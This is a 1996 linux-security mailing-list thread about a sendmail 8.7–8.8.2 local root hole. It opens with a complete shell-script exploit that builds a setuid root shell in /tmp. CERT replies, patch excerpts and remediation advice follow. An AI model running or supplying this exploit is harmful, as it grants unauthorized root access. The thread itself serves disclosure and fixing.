Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
similar:
#! /bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo ''main()
''>>leshka.c
echo ''{
''>>leshka.c
echo ''
execl("/usr/sbin/sendmail","/tmp/smtpd",0);
''>>leshka.c
echo ''}
''>>leshka.c
#
#
echo ''main()
''>>smtpd.c
echo ''{
''>>smtpd.c
echo '' setuid(0); setgid(0);
''>>smtpd.c
echo '' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");
''>>smtpd.c
echo ''}
''>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d '' ''|tr
-cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
From mail@mail.redhat.com redhat.com (list@199.183.24.1)
-----BEGIN PGP SIGNED MESSAGE----- Dawnshadow wrote:> > Hm, look what I got hold of today.. Works if sendmail is mode 4111 or > similar:[exploit script deleted] Sendmail 8.8.3 (which is available now) fixes the problem. Get it from ftp://ftp.sendmail.org/ucb/src/sendmail/ or ftp://ftp.cert.dfn.de/pub/tools/net/sendmail/ Bye, Wolfgang Ley (DFN-CERT) - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMpAf+QQmfXmOCknRAQEsRgQAgMs0kJbgjtGi7Gcyzzr6QiIYoEflvgOI BcLOgP7wMXEIAmzOexqkDp9AjMJK59yA5LTVv8+RKU/csxTHmf0mxd9XBXs7Cfsz sBUMxt986ZOSrsIZyxa2hRrq+CR1antiYos7sNmMtM9ahIXQVln1u/1uC6Fi4siq 8iLNFjgg1rI=BJIb -----END PGP SIGNATURE----- From mail@mail.redhat.com 25203 from invoked 19 network);
Wolfgang Ley says:> > Hm, look what I got hold of today.. Works if sendmail is mode 4111 or > > similar: > [exploit script deleted] > > Sendmail 8.8.3 (which is available now) fixes the problem.NO IT DOESN''T. I''ve tried it, and was able to get root consistently with sendmail-8.8.3. Would anybody outline the code that presumably plugs this hole? -- Regards, Uri uri@watson.ibm.com -=-=-=-=-=-=- <Disclaimer> From mail@mail.redhat.com Wed Nov 20 04:29:25 1996
On Mon, 18 Nov 1996, Wolfgang Ley wrote:> -----BEGIN PGP SIGNED MESSAGE----- > > Dawnshadow wrote: > > > > Hm, look what I got hold of today.. Works if sendmail is mode 4111 or > > similar: > > [exploit script deleted] > > Sendmail 8.8.3 (which is available now) fixes the problem. Get it from > ftp://ftp.sendmail.org/ucb/src/sendmail/ > or > ftp://ftp.cert.dfn.de/pub/tools/net/sendmail/hi.. rather than us sifting through the code could you tell us how it was fixed ? does the exec(argv[0]) check to see if the argv[0] = some predefined sendmail? I honestly cannot think of a time where argv[0] shouldnt equal the path name (tho I''m sure there must be) thus isnt this a bug in execve implementations? perhaps the new source only allows a reload of the binary if the HUP signal comes from uid=0 in which case I would rather like to see that implementation. [mod: I haven''t had time to look at the code either, but as far as I know checking the source of a signal is not possible. exec-ing sendmail_install_location would be an idea. However this wouldn''t explain why some people are still seeing exploit possibilities. -- REW] From mail@mail.redhat.com redhat.com (list@199.183.24.1)
-----BEGIN PGP SIGNED MESSAGE----- Uri Blumenthal wrote:> > Wolfgang Ley says: > > > Hm, look what I got hold of today.. Works if sendmail is mode 4111 or > > > similar: > > [exploit script deleted] > > > > Sendmail 8.8.3 (which is available now) fixes the problem. > > NO IT DOESN''T. > > I''ve tried it, and was able to get root consistently with sendmail-8.8.3. > Would anybody outline the code that presumably plugs this hole?Most probably you''ve forgotten to install the new sendmail binary (and delete the old one or at least turn of the setuid bit on the old version). Sendmail 8.8.3 does fix the problem at two indpendend places. The other possible problem is that you''ve forgotten to remove the setuid shell in /tmp before trying the exploit again. [mod: Uri has now admitted that this was indeed the case. Sorry for the stir. -- REW] Excerpt from the sendmail.8.8.3.patch file: *** sendmail-8.8.2/src/main.c Sat Oct 12 17:19:41 1996 - --- sendmail-8.8.3/src/main.c Sat Nov 16 10:34:25 1996 *************** *** 931,936 **** - --- 915,933 ---- /* fall through ... */ case MD_DAEMON: + /* check for permissions */ + if (RealUid != 0) + { + #ifdef LOG + if (LogLevel > 1) + syslog(LOG_ALERT, "user %d attempted to run daemon", + RealUid); + #endif + usrerr("Permission denied"); + exit(EX_USAGE); + } + vendor_daemon_setup(CurEnv); + Which fixes the problem that the can start sendmail in daemon mode, and *************** *** 1964,1969 **** - --- 1961,1975 ---- syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); #endif releasesignal(SIGHUP); + if (setgid(RealGid) < 0 || setuid(RealUid) < 0) + { + #ifdef LOG + if (LogLevel > 0) + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", + RealUid, RealGid); + #endif + exit(EX_OSERR); + } execv(SaveArgv[0], (ARGV_T) SaveArgv); Which resets the userid before restarting. [mod: In setuid programs, when you try to reset your uid back to the real uid/gid, ALWAYS first do the group ID and only then the uid. Doing the uid first, may disable your "right" to alter the gid. Linux may currently have "saved uids" but don''t count on that being portable. I just checked my approval mailbox, and about 50% of the submitted patches do it in the wrong order.] Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMpLi4gQmfXmOCknRAQGW3wQAigJVd+JtGEfBgcmCOL4FTDNiyzu1SgrT 4ZwFBGq+vtdXwh77UtR85q9Agu23DvgGO2BpE+p7PhqiSG7jfHh0tepdmd47q4gt 4Ef0yGlhx2aMpvn2Xx8PoHuGRrUNsdAfgn+w6X0ckhSaVBptlGmCJ0ULXYgKBH4o v1Mvb6vvvYk=uMjU -----END PGP SIGNATURE----- From mail@mail.redhat.com BOUNCE: [linux-security] Re: +i Chattr
On Tue, 19 Nov 1996, Quantum wrote:> hi.. rather than us sifting through the code could you tell us how it was<snip> Rather than sifting though half a dozen security mailing lists just to make you sure catch the latest sendmail hole (which seems to pop up once a week) before you get hacker, I suggest you all give qmail a try: www.qmail.org I have installed it on my machine and I am very happy with it. I have not found it lacking any features that I need. It installed quite cleanly on my Slackware 3.0 installation. I run a majordomo mailing list with 1,400 people on it. Qmail *flies* through the mailing list far faster than sendmail could ever hope to. Qmail has only one little program which runs as root, as opposed to all of sendmail. ---------- Tracy Reed http://www.ultraviolet.org http://www.linux.org - Escape the Gates of Hell From mail@mail.redhat.com relay2.redhat.com dutecai.et.tudelft.nl by (8.6.10/1.34JP)